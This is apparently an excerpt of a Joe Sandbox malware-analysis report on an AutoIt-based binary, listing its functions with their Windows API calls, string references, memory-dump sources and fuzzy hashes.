                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: 44fa77b6a76fe2faec1ec2c7cb22bdc80c7fa17b015e6b04253e13decae10138
                                                                                                                      • Instruction ID: 9e59e7943958d56c499406b60b493ab110cfc0bdecf903e034bf1ea79497b88e
                                                                                                                      • Opcode Fuzzy Hash: 44fa77b6a76fe2faec1ec2c7cb22bdc80c7fa17b015e6b04253e13decae10138
                                                                                                                      • Instruction Fuzzy Hash: 9FB17970644340AFDB44DF69C888BAABBE5FB85308F00891DF9999B2A1DB70EC05CF55
                                                                                                                      Function 0052449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005244AC
                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005244D2
                                                                                                                      • _wcscpy.LIBCMT ref: 00524500
                                                                                                                      • _wcscmp.LIBCMT ref: 0052450B
                                                                                                                      • _wcscat.LIBCMT ref: 00524521
                                                                                                                      • _wcsstr.LIBCMT ref: 0052452C
                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00524548
                                                                                                                      • _wcscat.LIBCMT ref: 00524591
                                                                                                                      • _wcscat.LIBCMT ref: 00524598
                                                                                                                      • _wcsncpy.LIBCMT ref: 005245C3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                      • API String ID: 699586101-1459072770
                                                                                                                      • Opcode ID: caf83856bf7ab779cb9dc5f089f6884e0464ee9cf4644adc1ead963979971f35
                                                                                                                      • Instruction ID: 22e7e9ef6fc459dc989236c870e69b390844def642420e98dd79a7061091c034
                                                                                                                      • Opcode Fuzzy Hash: caf83856bf7ab779cb9dc5f089f6884e0464ee9cf4644adc1ead963979971f35
                                                                                                                      • Instruction Fuzzy Hash: E641F8316402507BDB10AB769C07EBF7BACEF42715F04046FF905A61C2EB78A9019BA9
                                                                                                                      Function 004C27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004C28BC
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 004C28C4
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004C28EF
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 004C28F7
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 004C291C
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004C2939
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004C2949
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004C297C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004C2990
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 004C29AE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004C29CA
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004C29D5
                                                                                                                        • Part of subcall function 004C2344: GetCursorPos.USER32(?), ref: 004C2357
                                                                                                                        • Part of subcall function 004C2344: ScreenToClient.USER32(005857B0,?), ref: 004C2374
                                                                                                                        • Part of subcall function 004C2344: GetAsyncKeyState.USER32(00000001), ref: 004C2399
                                                                                                                        • Part of subcall function 004C2344: GetAsyncKeyState.USER32(00000002), ref: 004C23A7
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,004C1256), ref: 004C29FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      • Opcode ID: ca6b925ee9d3801c182e15166b1aa59ac4f2da971a2d616a1b28eac00ddb2524
                                                                                                                      • Instruction ID: 0191aa2e62e5015ebafbf6a34ed0a86b6040c645b411a1888b0b78149c687746
                                                                                                                      • Opcode Fuzzy Hash: ca6b925ee9d3801c182e15166b1aa59ac4f2da971a2d616a1b28eac00ddb2524
                                                                                                                      • Instruction Fuzzy Hash: 49B17E7960020AEFDB14DFA8CD45FEE7BB4FB18314F10422AFA15E6290DBB89841DB55
                                                                                                                      Function 0051A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0051A47A
                                                                                                                      • __swprintf.LIBCMT ref: 0051A51B
                                                                                                                      • _wcscmp.LIBCMT ref: 0051A52E
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0051A583
                                                                                                                      • _wcscmp.LIBCMT ref: 0051A5BF
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0051A5F6
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0051A648
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0051A67E
                                                                                                                      • GetParent.USER32(?), ref: 0051A69C
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 0051A6A3
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0051A71D
                                                                                                                      • _wcscmp.LIBCMT ref: 0051A731
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0051A757
                                                                                                                      • _wcscmp.LIBCMT ref: 0051A76B
                                                                                                                        • Part of subcall function 004E362C: _iswctype.LIBCMT ref: 004E3634
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                      • Opcode ID: 3d2a95ab5ea1f0eeb0226a9ebc739b69526e1d5d622b90f8d1808f600b3223e0
                                                                                                                      • Instruction ID: c1e67dd5317ec5204cec40a79327685ed33d65fe3b95a32885ff44733c5cebad
                                                                                                                      • Opcode Fuzzy Hash: 3d2a95ab5ea1f0eeb0226a9ebc739b69526e1d5d622b90f8d1808f600b3223e0
                                                                                                                      • Instruction Fuzzy Hash: A3A1D371205306AFEB16DF64C884FEABBE8FF44315F044529F999C2190DB34EA85CB92
                                                                                                                      Function 0051AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0051AF18
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AF29
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0051AF51
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0051AF6E
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AF8C
                                                                                                                      • _wcsstr.LIBCMT ref: 0051AF9D
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0051AFD5
                                                                                                                      • _wcscmp.LIBCMT ref: 0051AFE5
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0051B00C
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0051B055
                                                                                                                      • _wcscmp.LIBCMT ref: 0051B065
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0051B08D
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0051B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: 3dda2883acce32bb25ce49d04eadc1ddcb7df09c60e6c64eef4dc372bf14ac03
                                                                                                                      • Instruction ID: 82524e9d3f6e369c0c117af48e1cd43a494669ac781403ef189739b8ac9ff01f
                                                                                                                      • Opcode Fuzzy Hash: 3dda2883acce32bb25ce49d04eadc1ddcb7df09c60e6c64eef4dc372bf14ac03
                                                                                                                      • Instruction Fuzzy Hash: 6A818E75108205ABFB05DF15C885FEA7BE8FF54318F04846AFD898A096DB34DD8ACB61
                                                                                                                      Function 0054C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0054C627
                                                                                                                        • Part of subcall function 0054AB37: ClientToScreen.USER32(?,?), ref: 0054AB60
                                                                                                                        • Part of subcall function 0054AB37: GetWindowRect.USER32(?,?), ref: 0054ABD6
                                                                                                                        • Part of subcall function 0054AB37: PtInRect.USER32(?,?,0054C014), ref: 0054ABE6
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0054C690
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0054C69B
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0054C6BE
                                                                                                                      • _wcscat.LIBCMT ref: 0054C6EE
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0054C705
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0054C71E
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0054C735
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0054C757
                                                                                                                      • DragFinish.SHELL32(?), ref: 0054C75E
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0054C851
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbX
                                                                                                                      • API String ID: 169749273-4238052319
                                                                                                                      • Opcode ID: 885e0d49ec20f7f7087029038e408ce71affd5477bd0931f23fe8959d8db0544
                                                                                                                      • Instruction ID: 1ee39326d4267307927b9ee5501c2ba4f26594eeafae706a96b6c87d94aa7d20
                                                                                                                      • Opcode Fuzzy Hash: 885e0d49ec20f7f7087029038e408ce71affd5477bd0931f23fe8959d8db0544
                                                                                                                      • Instruction Fuzzy Hash: 30618875108301AFC701EF64D889EABBFE8FF99358F00092EF595921A1DB309909DB66
                                                                                                                      Function 0051ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: d908ea08c7e55c903ed237173b51e99b28bb47f38ab51a08c4c6748e5155b3f6
                                                                                                                      • Instruction ID: 7ba913ee3cd676acd2669aebab243150861b16ca74efb304ea63e7512f7fb795
                                                                                                                      • Opcode Fuzzy Hash: d908ea08c7e55c903ed237173b51e99b28bb47f38ab51a08c4c6748e5155b3f6
                                                                                                                      • Instruction Fuzzy Hash: 1131D434548209A7FA01EA66FE03FEE7F64BB14719F20442EB405710D2FA656F44D996
                                                                                                                      Function 00534FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00535013
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0053501E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00535029
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00535034
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0053503F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0053504A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00535055
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00535060
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0053506B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00535076
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00535081
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0053508C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00535097
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005350A2
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005350AD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 005350B8
                                                                                                                      • GetCursorInfo.USER32(?), ref: 005350C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2577412497-0
                                                                                                                      • Opcode ID: 0a7798035bceb96f99b5db3cea70280a90544d84a06f749b205b8c6d9be98408
                                                                                                                      • Instruction ID: dd063cec51535c9b8980eb6b50c44b8e0db601018c81851e3f0cf3b5a45c897f
                                                                                                                      • Opcode Fuzzy Hash: 0a7798035bceb96f99b5db3cea70280a90544d84a06f749b205b8c6d9be98408
                                                                                                                      • Instruction Fuzzy Hash: 3A3115B1D083196ADF109FB68C8999FBFE8FF04754F50453AA50CE7280EA796504CFA1
                                                                                                                      Function 0054A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054A259
                                                                                                                      • DestroyWindow.USER32(?,?), ref: 0054A2D3
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0054A34D
                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0054A36F
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0054A382
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0054A3A4
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004C0000,00000000), ref: 0054A3DB
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0054A3F4
                                                                                                                      • GetDesktopWindow.USER32 ref: 0054A40D
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0054A414
                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0054A42C
                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0054A444
                                                                                                                        • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                      • Opcode ID: 70da3bd47d86d20dc5ddddd9e8c9d90031404e91ebfae567e1af33da366d7628
                                                                                                                      • Instruction ID: 83acbffc2e9528c3aa4cb793e649b25452a2725677b7042c85978cb768e6afd9
                                                                                                                      • Opcode Fuzzy Hash: 70da3bd47d86d20dc5ddddd9e8c9d90031404e91ebfae567e1af33da366d7628
                                                                                                                      • Instruction Fuzzy Hash: 2871D374180204AFDB61CF28CC48FAA7BE5FB99308F04451DF985972A0E7B4E906EF52
                                                                                                                      Function 00544392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00544424
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0054446F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                      • Opcode ID: 88335a2d4fa44f9b075556f4aed3d127029b999e08ef30882abd788ac49bfa78
                                                                                                                      • Instruction ID: a894749573ae30083a84d8ba6bf5ab542fb2e30a73a28df3a8f44ff2d0386344
                                                                                                                      • Opcode Fuzzy Hash: 88335a2d4fa44f9b075556f4aed3d127029b999e08ef30882abd788ac49bfa78
                                                                                                                      • Instruction Fuzzy Hash: B6917C742007019BCB04EF11C455BAEBBE1BF95358F05886DF8965B3A2CB34ED8ACB95
                                                                                                                      Function 0054B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0054B8B4
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005491C2), ref: 0054B910
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0054B949
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0054B98C
                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0054B9C3
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0054B9CF
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054B9DF
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,005491C2), ref: 0054B9EE
                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0054BA0B
                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0054BA17
                                                                                                                        • Part of subcall function 004E2EFD: __wcsicmp_l.LIBCMT ref: 004E2F86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                      • API String ID: 1212759294-1154884017
                                                                                                                      • Opcode ID: 956645e58dcf465e09fda21102916fd86c3c7b27ce7d88b13b315c55449bd054
                                                                                                                      • Instruction ID: e1dc4ab9de69018f0338fd9da2969cb8ccdf6a19dc0e2b60188e3d08c91f2190
                                                                                                                      • Opcode Fuzzy Hash: 956645e58dcf465e09fda21102916fd86c3c7b27ce7d88b13b315c55449bd054
                                                                                                                      • Instruction Fuzzy Hash: B161BB71940219BAEB14DF69CC45FFA7BACFB08719F10451AF915D61C0DBB8E980EBA0
                                                                                                                      Function 0052DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0052DCDC
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0052DCEC
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0052DCF8
                                                                                                                      • __wsplitpath.LIBCMT ref: 0052DD56
                                                                                                                      • _wcscat.LIBCMT ref: 0052DD6E
                                                                                                                      • _wcscat.LIBCMT ref: 0052DD80
